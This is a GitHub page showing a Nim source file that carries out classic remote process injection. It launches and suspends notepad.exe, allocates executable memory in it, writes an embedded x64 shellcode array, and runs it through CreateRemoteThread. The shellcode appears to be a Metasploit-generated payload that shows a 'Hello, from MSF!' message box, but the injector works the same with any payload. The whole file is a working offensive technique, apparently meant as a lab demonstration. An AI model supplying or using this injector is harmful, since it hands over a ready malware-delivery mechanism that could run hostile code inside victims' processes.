-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathShellcodeInjection.nim
More file actions
76 lines (68 loc) · 3.53 KB
/
ShellcodeInjection.nim
File metadata and controls
76 lines (68 loc) · 3.53 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
import std/osproc
import winim/lean
proc injectShellcode(hProcess: HANDLE, shellcode: openArray[byte]): bool =
let
shellcodeSize = cast[SIZE_T](shellcode.len)
pRemoteBuffer = VirtualAllocEx(hProcess, NULL, shellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
if pRemoteBuffer == NULL:
echo "[!] - Unable to allocate memory in the remote process. Error: ", GetLastError()
return false
echo "[+] - Allocated ", shellcodeSize, " bytes in the remote process"
discard readline(stdin)
var bytesWritten: SIZE_T
if WriteProcessMemory(hProcess, pRemoteBuffer, addr shellcode[0], shellcodeSize, addr bytesWritten) == FALSE or bytesWritten != shellcodeSize:
echo "[!] - Unable to write shellcode to the remote process. Error: ", GetLastError()
return false
echo "[+] - Wrote shellcode to the remote process"
discard readline(stdin)
let hThread = CreateRemoteThread(
hProcess,
NULL,
0,
cast[LPTHREAD_START_ROUTINE](pRemoteBuffer),
NULL,
0x04,
NULL)
echo "[+] - Thread created in remote process"
discard readline(stdin)
hThread.ResumeThread()
defer: hThread.CloseHandle()
true
if isMainModule:
let
tProcess = startProcess("notepad.exe")
shellcode: array[322, byte] = [
0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,
0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,
0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,0x52,0x18,0x3e,0x48,
0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,0x0f,0xb7,
0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,
0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,
0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,
0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,
0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,0x18,0x3e,
0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,
0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,
0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,
0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,
0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x3e,
0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,
0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,
0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,
0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x3e,0x48,0x8b,
0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x3e,0x48,0x8d,0x8d,0x2a,
0x01,0x00,0x00,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x49,
0xc7,0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x0e,0x01,
0x00,0x00,0x3e,0x4c,0x8d,0x85,0x1f,0x01,0x00,0x00,0x48,0x31,
0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,0xd5,0x48,0x31,0xc9,
0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x65,0x6c,0x6c,
0x6f,0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,
0x00,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00,
0x75,0x73,0x65,0x72,0x33,0x32,0x2e,0x64,0x6c,0x6c,0x00]
tProcess.suspend()
defer: tProcess.close()
echo "[*] - Target process: ", tProcess.processID
let hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, cast[DWORD](tProcess.processID))
defer: hProcess.CloseHandle()
discard readline(stdin)
discard hProcess.injectShellcode(shellcode)